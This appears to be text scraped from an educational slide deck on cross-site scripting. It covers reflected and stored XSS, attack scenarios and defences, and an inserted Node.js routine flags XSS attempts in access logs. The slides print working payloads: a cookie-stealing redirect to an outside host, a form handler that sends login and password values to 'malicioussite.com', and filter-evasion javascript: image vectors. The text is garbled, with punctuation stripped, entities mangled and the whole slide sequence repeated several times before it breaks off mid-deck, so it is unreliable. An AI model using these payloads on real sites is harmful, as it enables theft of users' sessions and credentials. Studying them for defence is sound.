• It is the most common type. These holes show up when data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the response.
• Because HTML documents have a flat, serial structure that mixes control statements, formatting and the actual content, any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection.
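Because non-persistent XSS arrives in the request itself, attempts leave a trace in the web server's access log. The following detection routine is an added example, not code from the original slides: it parses constructed Common Log Format lines, strips the layers of URL encoding that a payload may be wrapped in (double encoding is a common way past naive keyword filters), and flags query parameters whose decoded value contains script markers. The log lines, endpoints and addresses are constructed for the demonstration; it runs under plain Node.js.

```javascript
// Added example, not from the original slides: flag reflected-XSS attempts in
// access logs. All sample lines, paths and addresses below are constructed.

const SAMPLE_LOG = [
  '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=shoes HTTP/1.1" 200 5120',
  '203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5210',
  '198.51.100.3 - - [10/Oct/2023:13:56:02 +0000] "GET /profile?name=%253Cimg%2520src%3Dx%2520onerror%3Dalert(1)%253E HTTP/1.1" 200 4801',
  '198.51.100.4 - - [10/Oct/2023:13:56:10 +0000] "GET /go?url=javascript%3Aalert(document.cookie) HTTP/1.1" 302 0',
  '192.0.2.8 - - [10/Oct/2023:13:57:00 +0000] "POST /login HTTP/1.1" 200 311',
];

// Markers that have no business in a query-string value of this application.
const MARKERS = [
  /<\s*script/i,
  /javascript\s*:/i,
  /\bon[a-z]{2,}\s*=/i,   // onerror=, onload=, onclick=, ...
  /<\s*iframe/i,
  /<\s*img/i,
];

// Common Log Format: ip ident user [time] "method target proto" status bytes
const CLF = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)/;

function parseLine(line) {
  const m = CLF.exec(line);
  if (!m) return null;
  const [, ip, ts, method, target, status] = m;
  const qIdx = target.indexOf("?");
  return {
    ip, ts, method, status: Number(status),
    path: qIdx === -1 ? target : target.slice(0, qIdx),
    query: qIdx === -1 ? "" : target.slice(qIdx + 1),
  };
}

// Undo repeated percent-encoding (up to maxRounds layers); stop when a round
// changes nothing or the input is not valid percent-encoding.
function fullyDecode(value, maxRounds = 3) {
  let cur = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur.replace(/\+/g, " ")); } catch { break; }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// One hit per (request, parameter) whose decoded value matches a marker.
function detectReflectedXss(lines) {
  const hits = [];
  for (const line of lines) {
    const req = parseLine(line);
    if (!req || !req.query) continue;
    // Split on & BEFORE decoding, so an encoded & inside a value stays inside it.
    for (const pair of req.query.split("&")) {
      const eq = pair.indexOf("=");
      const name = eq === -1 ? pair : pair.slice(0, eq);
      const decoded = fullyDecode(eq === -1 ? "" : pair.slice(eq + 1));
      const matched = MARKERS.filter((re) => re.test(decoded)).map((re) => re.source);
      if (matched.length) hits.push({ ip: req.ip, path: req.path, param: name, decoded, matched });
    }
  }
  return hits;
}
```

Run over `SAMPLE_LOG`, the routine reports three requests (the `<script>` in `q`, the double-encoded `<img ... onerror=` in `name`, and the `javascript:` URL in `url`) and ignores the benign search and the POST, which carries its data in the body rather than the query string; body parameters need the same treatment from the application log rather than the access log.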
12
Persistent…
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is online message boards where users are allowed to post HTML-formatted messages for other users to read.
13
Examples of attacks………
14
Scripting Via Malicious Link…
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing a malicious link with script, like:
<A HREF="http://legitimateSite.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>">Click here</A>
When a user clicks on this link, the URL, including the malicious code, is sent to the site. If the legitimate server sends a page back to the user including the value of clientprofile, the malicious code will be executed in the client's Web browser.
16
Stealing User's COOKIE…
17
If any part of the Web site uses cookies, then it may be possible to steal them from its users. In this scenario the attacker submits a page with malicious script to the part of the site that is vulnerable. When the page is displayed, the malicious script runs, collects the user's cookies and sends a request to the attacker's Web site with the cookies gathered. Using this technique the attacker can gain sensitive data such as passwords, credit card numbers and any arbitrary information the user inputs.
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message. Because the malicious scripts are executed in a context that appears to have originated from the legitimate server, the attacker has full access to the document retrieved and may send data contained in the page back to their site. If the embedded script code has additional capability to interact with the legitimate server without alerting the victim, the attacker could develop and exploit that posted data on a different page on the legitimate Web server.
20
By Scripting
21
Script can read all HTML content/tags in other window
Script can set/delete tags/content in other window. We can read and set form values, then run a submit()
Script can set vars and call functions in other window
document.write can allow script to create new tags/content in other window
This means that a script can read all HTML contents of a document, change the appearance of the document, modify existing tags and values, modify and submit forms. We have full control of the other window as long as it's in the same document.domain.
If we can forward cookies, then we can also forward other jscript-accessible content to an attacker. We can forward page contents, form values (including hidden…), jscript vars/state, jscript errors.
22
Some FACTS about the XSS attacks………
23
By SURVEY………
1st Gen XSS was against public sites and ran against everyone that visited the site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
• Cross-site scripting attacks are a special case of code injection
• Cross-site scripting carried out on websites was roughly 80% of all security vulnerabilities documented by Symantec as of 2007
• Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data
[Diagram: Dynamic XSS with 2-way comms]
Victim Browser: XSS against site; an IFRAME in which script commands run and into which other documents on the site are loaded; <script src="attacker.com/innerHTML_of_IFRAME">
XSS Vulnerable Server
Attacker System: new jscript… <script src="attacker.com">
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
8
How it is performed
Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)
9
bullXSS is an application level attack whichinvolves 3 parties
bullWe can load external script with a ltscript src=xxxgt tag
bullScript content can be loaded from anywhere (RPCRemote scripting is common)
bullMost attacks are only focused on collecting cookies
bullAttacker does not know actual responses to client
bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site
10
Types of XSS Attacks
11
Non-Persistent
bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection
12
Persistenthellip
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
9
bullXSS is an application level attack whichinvolves 3 parties
bullWe can load external script with a ltscript src=xxxgt tag
bullScript content can be loaded from anywhere (RPCRemote scripting is common)
bullMost attacks are only focused on collecting cookies
bullAttacker does not know actual responses to client
bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site
10
Types of XSS Attacks
11
Non-Persistent
bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection
12
Persistenthellip
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilities
Several classes of vulnerabilities or attack techniques are related to XSS. Cross-zone scripting exploits the "zone" concept of certain browsers and usually executes code with greater privilege.[31] HTTP header injection can be used to create cross-site scripting conditions because of escaping problems at the HTTP protocol level (in addition to enabling attacks such as HTTP response splitting).[32]
Cross-site request forgery (CSRF/XSRF) is almost the opposite of XSS: rather than exploiting the user's trust in a site, the attacker (and his malicious page) exploits the site's trust in the client software, submitting requests that the site believes represent conscious and intentional actions of authenticated users.[33]
Lastly, SQL injection exploits a vulnerability in the database layer of an application: when user input is concatenated into a query without being parameterised or escaped, attacker-chosen SQL statements are executed by the application.
10
Types of XSS Attacks
11
Non-Persistent
bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection
12
Persistenthellip
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
11
Non-Persistent
bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection
12
Persistenthellip
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
